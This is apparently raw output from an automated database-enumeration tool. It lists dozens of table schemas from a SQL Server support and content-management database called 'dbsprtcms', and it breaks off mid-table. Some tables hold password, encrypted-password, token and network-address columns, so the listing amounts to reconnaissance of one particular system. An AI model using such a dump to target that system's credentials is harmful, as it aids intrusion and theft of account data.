Database: dbsprtcms
Table: dbo.sprt_sc_metadata
[2 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| ssm_content_guid | char |
| ssm_content_property_name | nvarchar |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_purge_queue
[11 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| sipq_act_guid | char |
| sipq_csr_guid | char |
| sipq_csr_name | nvarchar |
| sipq_iss_guid | char |
| sipq_que_guid | char |
| sipq_ses_id | int |
| sipq_state | int |
| sipq_t_act_finished | datetime |
| sipq_t_act_started | datetime |
| sipq_t_csr_assigned | datetime |
| sipq_t_que_queued | datetime |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.BrowserInfo
[6 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| elementNum | int |
| incidentID | char |
| pDefaultBrowser | nvarchar |
| pIEVersion | nvarchar |
| pName | nvarchar |
| pNetscapeVersion | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_server_waiting_queue
[13 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| nc_swq_admin_request_guid | char |
| nc_swq_cpe_guid | char |
| nc_swq_expression | nvarchar |
| nc_swq_plan_alias | nvarchar |
| nc_swq_plan_guid | char |
| nc_swq_preceding_ar_guid | char |
| nc_swq_request | nvarchar |
| nc_swq_request_guid | char |
| nc_swq_request_xml | image |
| nc_swq_rpc_type | int |
| nc_swq_sequence | int |
| nc_swq_status | int |
| nc_swq_timestamp | datetime |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_admin_request
[17 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| nc_ar_admin_guid | char |
| nc_ar_catalog_guid | char |
| nc_ar_catalogtype | nvarchar |
| nc_ar_done_count | int |
| nc_ar_expiery_time | datetime |
| nc_ar_expression | nvarchar |
| nc_ar_filtercriteria | nvarchar |
| nc_ar_filtertype | nvarchar |
| nc_ar_guid | char |
| nc_ar_pattr_guid | char |
| nc_ar_plan_guid | char |
| nc_ar_recur_index | int |
| nc_ar_request | nvarchar |
| nc_ar_request_name | nvarchar |
| nc_ar_rpc_type | int |
| nc_ar_start_time | datetime |
| nc_ar_status | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.submissions
[11 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| incidentid | char |
| priority | int |
| processingTime | int |
| resetCount | int |
| retrievalTime | datetime |
| retrievedBy | nvarchar |
| status | int |
| submission | nvarchar |
| submissionTime | datetime |
| submittedBy | nvarchar |
| type | int |
+----------------+----------+
Database: dbsprtcms
Table: dbo.SMA_SWInstall
[10 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| elementNum | int |
| incidentID | char |
| pId | nvarchar |
| pSMA_SWInstall_Binding | nvarchar |
| psprtBranding | nvarchar |
| psprtFavorites | nvarchar |
| psprtStartPage | nvarchar |
| psprtSubAgent | nvarchar |
| pStatus | nvarchar |
| pTitle | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_class_prop_data
[7 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| adpd_class_prop_id | char |
| adpd_prop_data_datetime | datetime |
| adpd_prop_data_incidentid | char |
| adpd_prop_data_int | int |
| adpd_prop_data_type | int |
| adpd_prop_data_valimage | image |
| adpd_prop_data_varchar | nvarchar |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_session_services
[7 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| svss_call_reason | nvarchar |
| svss_date | datetime |
| svss_geography | nvarchar |
| svss_service_ryg | int |
| svss_service_type | nvarchar |
| svss_session_guid | char |
| svss_session_service_guid | char |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_diag_check
[12 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| svdc_check_name | nvarchar |
| svdc_display_order | int |
| svdc_geography_guid | char |
| svdc_group_id | int |
| svdc_group_name | nvarchar |
| svdc_is_group_check | nvarchar |
| svdc_link | nvarchar |
| svdc_operator | nvarchar |
| svdc_row_guid | char |
| svdc_threshold | nvarchar |
| svdc_type | nvarchar |
| svdc_units | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_Asset
[7 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| elementNum | int |
| incidentID | nchar |
| passet_type_ID | char |
| pDescription | nvarchar |
| pIdentification | nvarchar |
| pLocation | nvarchar |
| pServerTime | datetime |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_archive_history
[5 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| age_criteria | int |
| archive_server | nvarchar |
| archive_table | nvarchar |
| archive_time | datetime |
| rows_affected | int |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_content_cache
[5 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| sacc_collections | nvarchar |
| sacc_file_checksum | char |
| sacc_file_content | image |
| sacc_file_name | nvarchar |
| sacc_file_timestamp | datetime |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_datapoints
[7 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| si_datapoint_key | char |
| si_datapoint_rowguid | char |
| si_datapoint_type | int |
| si_datapoint_valdate | datetime |
| si_datapoint_valimage | image |
| si_datapoint_valint | int |
| si_datapoint_valnvarchar | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_user_brand_select
[5 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| elem_description | nvarchar |
| elem_guid | char |
| elem_image | nvarchar |
| elem_name | nvarchar |
| elem_value | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_email_template_data
[11 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| mail_attachment | char |
| mail_bcc | nvarchar |
| mail_body | ntext |
| mail_cc | nvarchar |
| mail_from | nvarchar |
| mail_style | char |
| mail_subject | nvarchar |
| mail_to | nvarchar |
| template_guid | char |
| template_major_version | int |
| template_minor_version | int |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_MinReqInfo
[9 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| elementNum | int |
| incidentID | char |
| pSMA_MinReqInfo_Binding | nvarchar |
| psma_mrq_cpu | nvarchar |
| psma_mrq_freediskspace | nvarchar |
| psma_mrq_ie_installed | nvarchar |
| psma_mrq_os | nvarchar |
| psma_mrq_outlook_installed | nvarchar |
| psma_mrq_ram | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_metering_details_log
[12 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| appname | nvarchar |
| appver | nvarchar |
| assetguid | char |
| dnsname | nvarchar |
| hostname | nvarchar |
| inserttime | datetime |
| netbios | nvarchar |
| process | nvarchar |
| tcpip | nvarchar |
| triggertime | datetime |
| type | nvarchar |
| username | nvarchar |
+-------------+----------+
Database: dbsprtcms
Table: dbo.SDC_Connectivity
[14 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| elementNum | int |
| incidentID | char |
| pCTSTicket | nvarchar |
| pDNSName | nvarchar |
| pDomain | nvarchar |
| pHostName | nvarchar |
| pIssueStatus | nvarchar |
| pMacID | nvarchar |
| pName | nvarchar |
| pNetBIOSName | nvarchar |
| pOSName | nvarchar |
| pPostToQueue | nvarchar |
| pTCPIP_Address | nvarchar |
| pUserName | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_purge_syspropdata
[23 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| sispp_class_guid | char |
| sispp_classdescription | nvarchar |
| sispp_classinstance | nvarchar |
| sispp_dp_valdate_1 | datetime |
| sispp_dp_valdate_2 | datetime |
| sispp_dp_valdate_3 | datetime |
| sispp_dp_valimage | image |
| sispp_dp_valint_1 | int |
| sispp_dp_valint_2 | int |
| sispp_dp_valint_3 | int |
| sispp_dp_valnvarchar_1 | nvarchar |
| sispp_dp_valnvarchar_2 | nvarchar |
| sispp_dp_valnvarchar_3 | nvarchar |
| sispp_dp_valnvarchar_4 | nvarchar |
| sispp_dp_valnvarchar_5 | nvarchar |
| sispp_dp_valnvarchar_6 | nvarchar |
| sispp_iss_guid | char |
| sispp_property_guid | char |
| sispp_propertyname | nvarchar |
| sispp_submission_max_rev | int |
| sispp_submission_rev | int |
| sispp_submission_rev_opid | char |
| sispp_submission_rev_time | datetime |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_sessions
[4 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| svs_sequence_number | int |
| svs_session_guid | char |
| svs_session_ryg | int |
| svs_workorder | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_log
[18 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| char_data1 | nvarchar |
| char_data2 | nvarchar |
| char_data3 | nvarchar |
| char_data4 | nvarchar |
| char_data5 | nvarchar |
| content_guid | nvarchar |
| date_data1 | datetime |
| date_data2 | datetime |
| date_used | datetime |
| int_data1 | int |
| int_data2 | int |
| int_data3 | int |
| int_data4 | int |
| int_data5 | int |
| principal | nvarchar |
| si_guid | nvarchar |
| source | nvarchar |
| verb | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_account_history
[8 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| acc_hist_interface | nvarchar |
| acc_hist_row_guid | char |
| account_event | nvarchar |
| data | nvarchar |
| event_time | datetime |
| password | nvarchar |
| user_name | nvarchar |
| window | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nexus_servers
[7 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| admin_address | nvarchar |
| stats | nvarchar |
| status | nchar |
| timestamp | datetime |
| user_address | nvarchar |
| version | nvarchar |
| web_address | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_query_archive
[9 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| scq_nresults | int |
| scq_qt_attrib | int |
| scq_query | nvarchar |
| scq_query_guid | char |
| scq_related_query | nvarchar |
| scq_row_guid | char |
| scq_rquery_attrib | int |
| scq_session | char |
| scq_time | datetime |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_cache
[6 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| crca_active | int |
| crca_cache_guid | char |
| crca_construct_time | datetime |
| crca_inreconstruct | int |
| crca_md5 | char |
| crca_reconstruct_time | datetime |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_transaction_devices
[5 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| svtd_attempt_number | int |
| svtd_device_id | nvarchar |
| svtd_device_pass | int |
| svtd_transaction_guid | char |
| svtd_txn_dvc_guid | char |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_hist
[6 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| sph_bulletin_id | nvarchar |
| sph_fixes | bigint |
| sph_patch_guid | char |
| sph_patch_name | nvarchar |
| sph_timestamp | datetime |
| sph_vulnerability | bigint |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_overrides
[8 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| svo_comments | nvarchar |
| svo_date | datetime |
| svo_device_id | nvarchar |
| svo_override_auth | nvarchar |
| svo_reason | nvarchar |
| svo_service_type | nvarchar |
| svo_session_guid | char |
| svo_workorder | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_author_module
[3 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| mod_guid | char |
| mod_name | nvarchar |
| scc_row_guid | char |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_collection_details
[4 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| coldet_enable | int |
| coldet_group | varchar |
| coldet_guid | char |
| coldet_mask | bigint |
+---------------+---------+
Database: dbsprtcms
Table: dbo.sprt_issues
[16 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| client_guid | nvarchar |
| group_id | int |
| index_id | int |
| ip_address | nvarchar |
| issues_id | int |
| livesupport | nvarchar |
| log | nvarchar |
| operator_type | nvarchar |
| problem | nvarchar |
| smartissue_guid | nvarchar |
| status | nvarchar |
| tier_id | nvarchar |
| time_close | datetime |
| time_created | datetime |
| time_open | datetime |
| user_guid | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_apps_lic
[6 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| adal_apps_id | char |
| adal_apps_lic_description | nvarchar |
| adal_apps_lic_exp_date | datetime |
| adal_apps_lic_id | char |
| adal_apps_lic_name | char |
| adal_apps_lic_quantity | int |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_field_clob
[5 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| sccfc_content_guid | char |
| sccfc_field_name | nvarchar |
| sccfc_field_value_clob | ntext |
| sccfc_row_guid | char |
| sccfc_version | int |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_payload
[9 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| author | nvarchar |
| content_guid | nvarchar |
| dnapath | nvarchar |
| flags | int |
| last_editor | nchar |
| last_modified | datetime |
| notes | nvarchar |
| time_created | datetime |
| title | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_slc_mapping
[6 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| slc_country | varchar |
| slc_ct | varchar |
| slc_language | varchar |
| slc_lg | varchar |
| slc_row_guid | char |
| slc_seg | varchar |
+--------------+---------+
Database: dbsprtcms
Table: dbo.SDC_IncidentInfo
[10 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| elementNum | int |
| incidentID | char |
| pDateTime | datetime |
| pDescription | nvarchar |
| pGUID | nvarchar |
| pName | nvarchar |
| pOwner | nvarchar |
| pSIType | nvarchar |
| pTime | datetime |
| serverTime | datetime |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_plan_cpe_status
[6 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| nc_pcs_admin_request_guid | char |
| nc_pcs_cpe_guid | char |
| nc_pcs_guid | char |
| nc_pcs_plan_guid | char |
| nc_pcs_status | int |
| nc_pcs_timestamp | datetime |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_comments
[5 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| svc_account_number | nvarchar |
| svc_comments | nvarchar |
| svc_date | datetime |
| svc_technician_id | nvarchar |
| svc_workorder | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_top_prob_schemes
[10 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| sc_tps_created_date | datetime |
| sc_tps_css_class | nvarchar |
| sc_tps_descr | nvarchar |
| sc_tps_formula | nvarchar |
| sc_tps_function_params | nvarchar |
| sc_tps_num | int |
| sc_tps_ranking | nvarchar |
| sc_tps_remarks | nvarchar |
| sc_tps_title | nvarchar |
| sc_tps_tp_guid | char |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_config_catalog
[14 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| nc_cc_blob | image |
| nc_cc_file_name | nvarchar |
| nc_cc_filetype | int |
| nc_cc_filtercondition | nvarchar |
| nc_cc_guid | char |
| nc_cc_manufacturer | nvarchar |
| nc_cc_oui | nvarchar |
| nc_cc_product_class | nvarchar |
| nc_cc_serial_number | nvarchar |
| nc_cc_tested | int |
| nc_cc_timestamp | datetime |
| nc_cc_url | nvarchar |
| nc_cc_user_guid | char |
| nc_cc_version | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sasv_testresults
[45 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| svr_avg | float |
| svr_avg_errors | float |
| svr_completion_id | nvarchar |
| svr_corr_bytes | int |
| svr_cust_id | nvarchar |
| svr_davic_status | nvarchar |
| svr_days_to_expire | nvarchar |
| svr_device_id | nvarchar |
| svr_device_serial | nvarchar |
| svr_fdc_level | int |
| svr_fdc_snr | nvarchar |
| svr_fdc_status | nvarchar |
| svr_hub_name | nvarchar |
| svr_install_attempts | int |
| svr_install_failed | int |
| svr_ip | nvarchar |
| svr_ippv_enabled | nvarchar |
| svr_is_install_box | nvarchar |
| svr_last_tuned | nvarchar |
| svr_loss | int |
| svr_mode | nvarchar |
| svr_plant_failed | int |
| svr_qam_stats | nvarchar |
| svr_qam_status | nvarchar |
| svr_qpsk_id | nvarchar |
| svr_qpsk_name | nvarchar |
| svr_qpsk_status | nvarchar |
| svr_rdc_level | int |
| svr_rdc_status | nvarchar |
| svr_reason | nvarchar |
| svr_reconcile | nvarchar |
| svr_settop_gain | nvarchar |
| svr_status | nvarchar |
| svr_sub_expires | datetime |
| svr_tech_fname | nvarchar |
| svr_tech_id | nvarchar |
| svr_tech_lname | nvarchar |
| svr_test_source | nvarchar |
| svr_trans_date | datetime |
| svr_trans_id | int |
| svr_trouble_call | nvarchar |
| svr_tuner_status | nvarchar |
| svr_type | nvarchar |
| svr_uncorr_blks | int |
| svr_workorder | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_type_verb
[11 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| scctv_alttext | nvarchar |
| scctv_attr_mask | int |
| scctv_class | nchar |
| scctv_content_type_guid | char |
| scctv_img | nvarchar |
| scctv_imgdim | nvarchar |
| scctv_perm_mask | int |
| scctv_row_guid | char |
| scctv_sortorder | int |
| scctv_url | nvarchar |
| scctv_verb | nchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_queueviewinfo
[6 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| siqin_queue_guid | char |
| siqin_queue_helpstring | nvarchar |
| siqin_queue_laststate | nvarchar |
| siqin_queue_layout_xml | ntext |
| siqin_queue_name | char |
| siqin_queue_user | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_manifest_content_map
[4 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| cntcontent_type | nvarchar |
| cntinstance_title | nvarchar |
| manifestcm_guid | char |
| update_identity | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_nonplan_request_log
[8 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| nc_npr_ar_guid | char |
| nc_npr_cpe_guid | char |
| nc_npr_guid | char |
| nc_npr_req_origin_name | nvarchar |
| nc_npr_req_origin_type | nvarchar |
| nc_npr_req_rpc_type | int |
| nc_npr_req_user_guid | char |
| nc_npr_timestamp | datetime |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_systune_tokens
[12 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| sttk_analyst_guid | char |
| sttk_client_sessid | char |
| sttk_client_uniqueid | char |
| sttk_ext_guid | char |
| sttk_ext_source | varchar |
| sttk_redeemed_count | int |
| sttk_services | varchar |
| sttk_status | char |
| sttk_time_generated | datetime |
| sttk_time_redeemed | datetime |
| sttk_token | char |
| sttk_ttl_minutes | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_cpe_params
[7 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| nc_cpp_cpe_guid | char |
| nc_cpp_flag | int |
| nc_cpp_guid | char |
| nc_cpp_paramvalueblob | image |
| nc_cpp_request_guid | char |
| nc_cpp_request_origin | nvarchar |
| nc_cpp_timestamp | datetime |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_account_history_archive
[8 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| acc_hist_interface | nvarchar |
| acc_hist_row_guid | char |
| account_event | nvarchar |
| data | nvarchar |
| event_time | datetime |
| password | nvarchar |
| user_name | nvarchar |
| window | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_details_rpt
[16 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| chdet_analyst | nvarchar |
| chdet_analyst_fixed | int |
| chdet_assigned_date | datetime |
| chdet_closed_by | int |
| chdet_closed_date | datetime |
| chdet_created_date | datetime |
| chdet_escstatus | int |
| chdet_handle_time | float |
| chdet_htprevious | float |
| chdet_problem | nvarchar |
| chdet_queue | nvarchar |
| chdet_room | varchar |
| chdet_user_fixed | int |
| chdet_user_name | nvarchar |
| chdet_wait_time | float |
| chdet_wrap_time | float |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_field_blob
[5 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| sccfb_content_guid | char |
| sccfb_field_name | nvarchar |
| sccfb_field_value_blob | image |
| sccfb_row_guid | char |
| sccfb_version | int |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_usage
[15 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scus_admin_weight | int |
| scus_comment | nvarchar |
| scus_content_guid | char |
| scus_content_version | int |
| scus_data | nvarchar |
| scus_position | int |
| scus_principal | nvarchar |
| scus_rating | int |
| scus_result | int |
| scus_row_guid | char |
| scus_session | char |
| scus_solved | int |
| scus_timestamp | datetime |
| scus_verb | nchar |
| scus_view | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_systune_sessions
[9 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| sts_analyst_guid | char |
| sts_createdate | datetime |
| sts_end | datetime |
| sts_macid | char |
| sts_package_guid | char |
| sts_ra_guid | char |
| sts_session_guid | char |
| sts_start | datetime |
| sts_username | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_NetworkAdapter
[10 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAdapterType | nvarchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pMACAddress | nvarchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
| pProductName | nvarchar |
| pServiceName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_user_geography
[3 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| svug_geography_guid | char |
| svug_row_guid | char |
| svug_user_name | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content
[25 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| scc_active_date | datetime |
| scc_attributes | int |
| scc_author | nvarchar |
| scc_comments | nvarchar |
| scc_content_guid | char |
| scc_content_type_guid | char |
| scc_description | nvarchar |
| scc_expiration_type | nchar |
| scc_expire_date | datetime |
| scc_folder_guid | char |
| scc_friendly_id | nvarchar |
| scc_keywords | nvarchar |
| scc_language | nchar |
| scc_last_mod | datetime |
| scc_noindex | nvarchar |
| scc_owner | nvarchar |
| scc_product | nvarchar |
| scc_reference_guid | char |
| scc_reference_version | int |
| scc_retired | int |
| scc_review_date | datetime |
| scc_row_guid | char |
| scc_status | nchar |
| scc_title | nvarchar |
| scc_version | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_EmailInfo
[10 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| elementNum | int |
| incidentID | char |
| paccountname | nvarchar |
| pclient | nvarchar |
| pclientversion | nvarchar |
| pconfigured | nvarchar |
| pdisplayname | nvarchar |
| ppopserver | nvarchar |
| pSMA_EmailInfo_Binding | nvarchar |
| psmtpserver | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.Software
[6 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| elementNum | int |
| incidentID | char |
| pBrowserOpenCommand | nvarchar |
| pDefaultEmailClient | nvarchar |
| pLocale | nvarchar |
| pName | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_event_history
[5 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| alertevent_id | nvarchar |
| event_guid | nvarchar |
| eventhistory_id | char |
| run_status | int |
| timestamp | datetime |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_role
[3 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| scr_idbit | int |
| scr_name | nvarchar |
| scr_row_guid | char |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_default_install_lock
[4 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| dil_db_version | char |
| dil_locked_date | datetime |
| dil_servername | nvarchar |
| dil_wait_time | datetime |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_proprevisions
[10 columns]
+-------------------------------+----------+
| Column | Type |
+-------------------------------+----------+
| si_datapoint_fkey | char |
| si_proprevision_class | char |
| si_proprevision_classinstance | nvarchar |
| si_proprevision_property | char |
| si_proprevision_rowguid | char |
| si_proprevision_siguid | char |
| si_submission_max_rev | int |
| si_submission_rev | int |
| si_submission_rev_opid | char |
| si_submission_rev_time | datetime |
+-------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_pcsoln_trickles
[5 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| pcs_tr_desc | nvarchar |
| pcs_tr_guid | char |
| pcs_tr_level | int |
| pcs_tr_name | nvarchar |
| pcs_tr_solnguid | char |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_asset_groups
[3 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| displayname | nvarchar |
| group_id | char |
| parent | char |
+-------------+----------+
Database: dbsprtcms
Table: dbo.Win32_LogicalDisk
[5 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| elementNum | int |
| incidentID | char |
| pDriveName | nvarchar |
| pTotalCapacity | decimal |
| pTotalFreeSpace | decimal |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.Classes
[4 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| classAttributes | int |
| classDescription | nvarchar |
| objectID | nchar |
| tableName | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_email_outbox
[17 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| comments | nvarchar |
| email_outbox_guid | char |
| email_type | int |
| mail_attachment | nvarchar |
| mail_bcc | nvarchar |
| mail_body | ntext |
| mail_cc | nvarchar |
| mail_from | nvarchar |
| mail_subject | nvarchar |
| mail_to | nvarchar |
| received_list | nvarchar |
| send_date | datetime |
| send_through | nvarchar |
| status | int |
| template_guid | char |
| template_priority | int |
| visible | int |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ini_names
[6 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| category_guid | char |
| category_id | int |
| content_guid | nvarchar |
| content_type | nvarchar |
| status | nvarchar |
| title | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.MicrosoftIE_ConnSettings
[28 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAllowInternetPrograms | nvarchar |
| pAutoDisconnect | nvarchar |
| pAutoProxyDetectMode | nvarchar |
| pDataEncryption | nvarchar |
| pDefault | int |
| pDefaultGateway | nvarchar |
| pDialUpServer | nvarchar |
| pDisconnectIdleTime | int |
| pEncryptedPassword | nvarchar |
| pIPAddress | nvarchar |
| pIPHeaderCompression | nvarchar |
| pModem | nvarchar |
| pName | nvarchar |
| pNetworkLogon | nvarchar |
| pNetworkProtocols | nvarchar |
| pPrimaryDNS | nvarchar |
| pPrimaryWINS | nvarchar |
| pProxy | nvarchar |
| pProxyOverride | nvarchar |
| pRedialAttempts | int |
| pRedialWait | int |
| pSecondaryDNS | nvarchar |
| pSecondaryWINS | nvarchar |
| pServerAssignedIPAddress | nvarchar |
| pServerAssignedNameServer | nvarchar |
| pSoftwareCompression | nvarchar |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_email_template_metadata
[20 columns]
+-----------------------------+----------+
| Column | Type |
+-----------------------------+----------+
| template_activator_list | nvarchar |
| template_bulk | int |
| template_creation_date | datetime |
| template_creator | nvarchar |
| template_desc | nvarchar |
| template_expiration_date | datetime |
| template_expiration_notify | nvarchar |
| template_expiration_status | int |
| template_guid | char |
| template_last_modified_date | datetime |
| template_last_modified_user | nvarchar |
| template_macro_filter | nvarchar |
| template_major_version | int |
| template_minor_version | int |
| template_name | nvarchar |
| template_outbox_table | int |
| template_priority | int |
| template_publish_status | int |
| template_save_to_outbox | int |
| template_type | int |
+-----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_scheduled_tasks
[9 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scheduled_tasks_guid | char |
| task_description | nvarchar |
| task_enabled | int |
| task_language | nvarchar |
| task_name | nvarchar |
| task_schedule | nvarchar |
| task_script | ntext |
| task_sentinel | nvarchar |
| task_server_mask | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_audit
[8 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scau_content_guid | char |
| scau_content_version | int |
| scau_data | nvarchar |
| scau_principal | nvarchar |
| scau_row_guid | char |
| scau_source | char |
| scau_timestamp | datetime |
| scau_verb | nchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_rotated_voip
[34 columns]
+--------------------------------+----------+
| Column | Type |
+--------------------------------+----------+
| svtr_911_enabled | nvarchar |
| svtr_911_enabled_ryg | int |
| svtr_jitter_time | nvarchar |
